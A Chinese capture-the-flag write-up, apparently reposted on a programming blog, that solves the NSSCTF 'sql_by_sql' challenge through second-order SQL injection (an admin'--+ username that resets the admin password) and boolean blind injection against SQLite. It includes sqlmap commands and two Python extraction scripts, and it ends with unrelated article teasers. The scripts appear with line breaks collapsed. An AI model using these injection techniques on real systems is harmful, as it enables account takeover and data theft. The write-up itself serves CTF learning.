[NSSRound#1 Basic]sql_by_sql - 二次注入+布尔盲注||sqlmap

1
进入注册界面后
  假设sql:update user set password = ‘’ where username = ‘’ and password = ‘’
    此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话
  update user set password = ‘123’ where username = ‘admin’#’ and password = ‘’

1、所以先注册名为:admin’–+的用户,这样就可以直接修改admin密码,登录后,获取cookie
2、用户界面提供查询功能,但是只能查有或没有该用户,而且不会出现报错,说明是sqllite数据库

方法一:sqlmap
尝试利用sqlmap爆破,因为查询是在query层次,且是post,所以我们的sqlmap代码如下:
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ"
——如果这里的url写错了,是查不到的,而且cookie很重要,非admin的cookie无法进行查询
——查询结果
  Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1049=1049
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ" --table
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ" -T flag --columns
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ" -T flag -C flag --dump
得到flag=NSSCTF{b10c030d-ff18-43ce-b0a8-61cf26d9c070}

方法二:手动盲注+py脚本
用burpsuite抓包,判断id类型,使用id=1 or 1=1,如果是字符型则会提示不存在,但是这里明显可以执行,说明id是数字型
1、构造sql注入语句,由于sqllite数据库,sql的保留字会有所区别
2、SQLite中没有ascii()函数,所以我们盲注时需要直接和字符比较
1 and substr((select group_concat(name) from sqlite_master where type='table'),1,1)='a' —— 查表名
……
脚本:

import requests
from string import *
url="http://1.14.71.254:28287/query"
result=''
str=ascii_letters+digits+"{}-_"
for x in range(38,100):print("this is",x)for i in str:query="-1 or substr((select group_concat(name) from sqlite_master),{},1)>'{}'"#query="-1 or substr((select group_concat(sql) from sqlite_master where name='flag'),{},1)>'{}'"#query="-1 or substr((select flag from flag),{},1)='{}'"data={"id":query.format(x,i)}# print(data)res=requests.post(url=url,data=data)print(res.text)if "exist" in res.text:result+=iprint(result)# flag=Falsebreak
print(result)

脚本2:

import requeststrue_result = 'exist'    #正确的回显
url = 'http://1.14.71.254:28033/query'def table_name(url):table_name = ''select = "select name from sqlite_master where type='table' limit 1,1"for i in range(1, 60):tablelength_payload = f'''1 and length(({select}))={i}'''data = {'id':tablelength_payload}response = requests.post(url=url, data=data)if true_result in response.text:print("table length : "+str(i))for j in range(1, i + 1):print('[*]now in {}'.format(j))for asc in range(33, 127):ss = chr(asc)table_payload = f'''id=1 and substr(({select}),{j},1)=\'{ss}\''''data2 = {'id':table_payload}res = requests.post(url=url, data=data2)if true_result in res.text:table_name = table_name + chr(asc)print(table_name)breakbreak
def column_name(url):column_name = ''select = "select sql from sqlite_master where type='table' and name = 'flag'"for i in range(1, 100):columnlength_payload = f'''1 and length(({select}))={i}'''data = {'id':columnlength_payload}response = requests.post(url=url, data=data)if true_result in response.text:print("column length : "+str(i))for j in range(1, i + 1):print("[*]now in {}".format(j))for asc in range(33, 127):ss = chr(asc)column_payload = f'''1 and substr(({select}),{j},1)=\'{ss}\''''data2 = {'id': column_payload}res = requests.post(url=url, data=data2)if true_result in res.text:column_name = column_name + chr(asc)print(column_name)breakbreak
def getflag(url):for i in range(1,60):flag = ''select = "select flag from flag limit 0,1"flaglength = f'''1 and length(({select}))={i}'''data = {'id': flaglength}response = requests.post(url=url, data=data)if true_result in response.text:print("flag length : "+str(i))for j in range(1, i+1):print("[*]now in {}".format(j))for asc in range(33,127):ss = chr(asc)flagpayload = f'''1 and substr(({select}),{j},1)=\'{ss}\''''data2 = {'id': flagpayload}res = requests.post(url=url, data=data2)if true_result in res.text:flag = flag+chr(asc)print(flag)breakbreak
#table_name(url)
#column_name(url)
getflag(url)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/149185.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[架构之路-231]:计算机硬件与体系结构 - 性能评估汇总,性能优化加速比

[架构之路-231]:计算机硬件与体系结构 - 性能评估汇总,性能优化加速比

目录 一、计算机体系结构 二、计算机性能评估 2.1 分类方法1 2.2 分类方法2 三、常见的专项性能测试工具 3.1 浮点运算性能(FLOPS) 3.2 综合理论性能法 3.3 历史基准测试(跑分软件):通过运行典型的综合性的程序…
阅读更多...
毕设-原创医疗预约挂号平台分享

毕设-原创医疗预约挂号平台分享

医疗预约挂号平台 不是尚医通项目,先看项目质量(有源码论文) 项目链接:医疗预约挂号平台git地址 演示视频:医疗预约挂号平台 功能结构图 登录注册模块:该模块具体分为登录和注册两个功能,这些…
阅读更多...
想要精通算法和SQL的成长之路 - 最长连续序列

想要精通算法和SQL的成长之路 - 最长连续序列

想要精通算法和SQL的成长之路 - 最长连续序列 前言一. 最长连续序列1.1 并查集数据结构创建1.2 find 查找1.3 union 合并操作1.4 最终代码 前言 想要精通算法和SQL的成长之路 - 系列导航 并查集的运用 一. 最长连续序列 原题链接 这个题目,如何使用并查集是一个小难…
阅读更多...
R语言教程课后习题答案(持续更新中~~)

R语言教程课后习题答案(持续更新中~~)

R语言教程网址如下 https://www.math.pku.edu.cn/teachers/lidf/docs/Rbook/html/_Rbook/index.html 目录 source()函数可以运行保存在一个文本文件中的源程序 R向量下标和子集 数值型向量及其运算 日期功能 R因子类型 source()函数可以运行保存在一个文本文件中的源程序…
阅读更多...
【C语言】动态通讯录(超详细)

【C语言】动态通讯录(超详细)

通讯录是一个可以很好锻炼我们对结构体的使用,加深对结构体的理解,在为以后学习数据结构打下结实的基础 这里我们想设计一个有添加联系人,删除联系人,查找联系人,修改联系人,展示联系人,排序这几…
阅读更多...
快速了解Spring Cache

快速了解Spring Cache

SpringCache是一个框架,实现了基于注解的缓存功能,只需要简单的加一个注解,就可以实现缓存功能。 SpringCache提供了一层抽象,底层可以切换不同的缓存实现。例如: EHChche Redis Caffeine 常用注解: Enabl…
阅读更多...
Vue中如何进行分布式路由配置与管理

Vue中如何进行分布式路由配置与管理

Vue中的分布式路由配置与管理 随着现代Web应用程序的复杂性不断增加,分布式路由配置和管理成为了一个重要的主题。Vue.js作为一种流行的前端框架,提供了多种方法来管理Vue应用程序的路由。本文将深入探讨在Vue中如何进行分布式路由配置与管理&#xff0…
阅读更多...
全志ARM926 Melis2.0系统的开发指引⑧

全志ARM926 Melis2.0系统的开发指引⑧

全志ARM926 Melis2.0系统的开发指引⑧ 编写目的12.5. 应用程序编写12.5.1. 简单应用编写12.5.1.1. 注册应用12.5.1.2. 创建管理窗口12.5.1.3. 实现管理窗口消息处理回调函数12.5.1.4. 创建图层12.5.1.5. 创建 framewin12.5.1.6. 实现 framewin 消息处理回调函数 -. 全志相关工具…
阅读更多...
【BBC新闻文章分类】使用 TF 2.0和 LSTM 的文本分类

【BBC新闻文章分类】使用 TF 2.0和 LSTM 的文本分类

一、说明 NLP上的许多创新是如何将上下文添加到词向量中。常见的方法之一是使用递归神经网络
阅读更多...
SSM-XML整合

SSM-XML整合

SSM-XML整合 核心配置文件 maven坐标 <dependencies><!--数据库驱动--><dependency><groupId>mysql</groupId><artifactId>mysql-connector-java</artifactId><version>8.0.27</version></dependency><!--数据…
阅读更多...
解决dockerfile创建镜像时pip install报错的bug

解决dockerfile创建镜像时pip install报错的bug

项目场景&#xff1a; 使用docker-compose创建django容器 问题描述 > [5/5] RUN /bin/bash -c source ~/.bashrc && python3 -m pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple: 0.954 Looking in indexes: https://…
阅读更多...
Next.js 入门笔记

Next.js 入门笔记

前言 之前初步体验了 React 的魅力, 又看文档理解了一下 useState 和 useEffect, 目前初步理解的概念是: useState 用来声明在组件中使用并且需要修改的变量 useEffect 用来对 useState 声明的变量进行初始化赋值 可能理解的不太准确, 不过大概差不多是这么个意思. 但是再往后…
阅读更多...
1.3.OpenCV技能树--第一单元--图像的基础操作(基础篇)

1.3.OpenCV技能树--第一单元--图像的基础操作(基础篇)

文章目录 1.文章内容来源2.图像的基本操作2.1.图像加载2.2.图像显示2.3.数据读取2.4.截取图像2.5.颜色通道提取2.5.1.保留红色处理2.5.2.保留绿色处理2.5.3.保留蓝色处理 3.易错点总结与反思 1.文章内容来源 1.题目来源: 2.资料来源:https://edu.csdn.net/skill/opencv/opencv…
阅读更多...
软技能继续挑战网络安全领域

软技能继续挑战网络安全领域

根据 ISACA 的一份新报告&#xff0c;新的网络安全调查结果指出了网络安全专家缺乏的领域&#xff0c;其中人际技能、云计算和安全措施是网络安全专家最突出的技能缺陷。 59% 的网络安全领导者表示他们的团队人手不足。50% 的受访者表示有非入门级职位的职位空缺&#xff0c;而…
阅读更多...
八大排序源码(含优化)

八大排序源码(含优化)

文章目录 1、直接插入排序2、希尔排序3、选择排序4、冒泡排序5、堆排序6、快速排序快速排序递归实现霍尔法挖坑法前后指针法快速排序小区间优化 快速排序非递归实现 7、归并排序归并排序递归实现归并排序非递归 8、计数排序 大家好&#xff0c;我是纪宁&#xff0c;这篇文章是关…
阅读更多...
GPT系列论文解读:GPT-2

GPT系列论文解读:GPT-2

GPT系列 GPT&#xff08;Generative Pre-trained Transformer&#xff09;是一系列基于Transformer架构的预训练语言模型&#xff0c;由OpenAI开发。以下是GPT系列的主要模型&#xff1a; GPT&#xff1a;GPT-1是于2018年发布的第一个版本&#xff0c;它使用了12个Transformer…
阅读更多...
VUE3照本宣科——认识VUE3

VUE3照本宣科——认识VUE3

VUE3照本宣科——认识VUE3 前言一、命令创建项目1.中文官网2.菜鸟教程 二、VUE3项目目录结构1.public2.src&#xff08;1&#xff09;assets&#xff08;2&#xff09;components 3. .eslintrc.cjs4. .gitignore5. .prettierrc.json6.index.html7.package.json8.README.md9.vit…
阅读更多...
进程调度算法之时间片轮转调度(RR),优先级调度以及多级反馈队列调度

进程调度算法之时间片轮转调度(RR),优先级调度以及多级反馈队列调度

1.时间片轮转调度算法(RR) round Robin 1.算法思想 公平地、轮流地为各个进程服务&#xff0c;让每个进程在一定时间间隔内都可以得到响应。 2.算法规则 按照各进程到达就绪队列的顺序&#xff0c;轮流让各个进程执行一个时间片&#xff08;如100ms&#xff09;。 若进程未…
阅读更多...
Linux 文件上传、下载

Linux 文件上传、下载

1、通过FinalShell工具虚拟机进行数据交换 在FinalShell软件的下方窗体中&#xff0c;提供了Linux的文件系统视图&#xff0c;可以方便的&#xff1a; 浏览文件系统&#xff0c;找到合适的文件&#xff0c;右键点击下载&#xff0c;即可传输到本地电脑 浏览文件系统&#xff0…
阅读更多...
数值分析学习笔记——绪论【华科B站教程版本】

数值分析学习笔记——绪论【华科B站教程版本】

绪论 数值分析概念 用计算机求解数学问题的数值方法和理论 三大科学研究方法 实验理论分析科学计算&#xff08;用计算机去辅助研究&#xff09;&#xff1a;数值方法计算机 解析解和近似解 解析解&#xff1a;使用数学方法求出或推导出的结果&#xff0c;往往可以求解出…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023